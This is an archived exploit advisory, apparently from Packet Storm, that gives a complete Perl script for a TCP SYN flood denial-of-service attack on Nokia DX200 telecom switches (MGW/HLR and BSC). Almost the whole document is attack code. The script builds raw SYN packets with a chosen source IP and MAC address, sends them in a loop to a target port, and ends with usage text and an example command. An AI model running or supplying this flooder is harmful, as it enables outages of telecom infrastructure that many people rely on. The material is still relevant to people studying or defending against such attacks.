Nokia DX200 Denial Of Service

2009-01-23T00:00:00
ID PACKETSTORM:74244
Type packetstorm
Reporter TaMBaRuS
Modified 2009-01-23T00:00:00

Description

                                        
                                            `#######################################################################  
#Vulnerability: Nokia TCP Syn Flood DoS - DX200  
#Synopsis : Denial of Service  
#Affected Platforms: DX200 M13 (MGW/HLR), S12 (BSC)  
#Severity: High Risk  
#Vendor: Nokia (http://www.nokia.com/)  
#Exploit Release Date: 01/21/2009  
#By: tambarus (tambarus@gmail.com)  
#######################################################################  
  
#!/usr/bin/perl  
  
eval ("use Getopt::Long;");die "[error] Getopt::Long perl module is not installed \n" if $@;  
eval ("use Net::RawIP;");die "[error] Net::RawIP perl module is not installed \n" if $@;  
eval ("use Term::ProgressBar;");  
die "[error] Term::ProgressBar perl module is not installed \n" if $@;  
my $VERSION = "1.0";  
print "$0, $PgmName, V $VERSION \n";  
GetOptions (   
"help" =>\$usage,  
"device=s" => \$device,   
"source=s" =>\$sourceip,  
"dest=s"=>\$destip,  
"sourcemac=s"=>\$sourcemac,  
"destmac=s"=>\$destmac,  
"port=n"=> \$tcpport,  
);  
  
my $timeout = "0,1"; # Timeout  
  
if ($usage) {&usage;}   
  
if (!$device) {  
$device= 'eth0'; # Enter Nokia DX200 IP  
}  
  
if (!$destmac) {print "Dest MAC not found \n"; &usage;}  
if (!$sourceip) {print "Source IP not found \n"; &usage;}  
if (!$destip) {print "Dest IP not found \n"; &usage;}  
if (!$tcpport) {print "TCP port not found \n"; &usage;}  
  
my $syn="1"; # TCP SYN SET  
my $tcpdata = "BLASTNOKIA"; # TCP payload  
my $count=0;  
  
#Initialize Progres Bar   
my $progress = Term::ProgressBar->new(32768);  
$progress->minor(0);  
$packet = new Net::RawIP;  
$packet-> ethnew($device);  
  
if (!$sourcemac) {  
$packet -> ethset( dest => $destmac);  
}else {   
$packet -> ethset( source =>$sourcemac, dest => $destmac);  
}  
  
for ($count=0; $count< 65537 ; $count++) {  
  
$packet->set({  
  
ip => {  
saddr => $sourceip,  
daddr => $destip   
},  
  
tcp => {  
check => 0x0010 , # TCP Packet Checksum 0 for auto correct  
source => $count,  
dest => $tcpport,  
syn => $syn,  
data => $tcpdata  
}});  
$packet->ethsend($timeout);  
#$packet->send($timeout);  
  
$progress->update($_);  
$count++;  
}  
  
sub usage {  
print <<EOF ;  
This vulnerability is already disclosed and can be exploited by TCP Syn Flooding.  
  
usage: $0 [ --device=interface ] [--source=IP] [--dest=IP] [--sourcemac=MAC] [--destmac=MAC] [--port=n]  
  
Options:  
  
--help This message  
--device Network interface (defaut set eth0)  
--source Victim source IP  
--dest Victim destination IP  
--sourcemac Victim source MAC  
--destmac MAC Address of the gateway  
--port TCP port   
  
Example: ./NokiaFlooder.pl --device eth0 --source 10.1.1.88 --dest 10.1.1.99 --sourcemac 00:11:22:22:11:00 --destmac 00:11:22:22:11:99 --port 23   
EOF   
exit shift;  
}`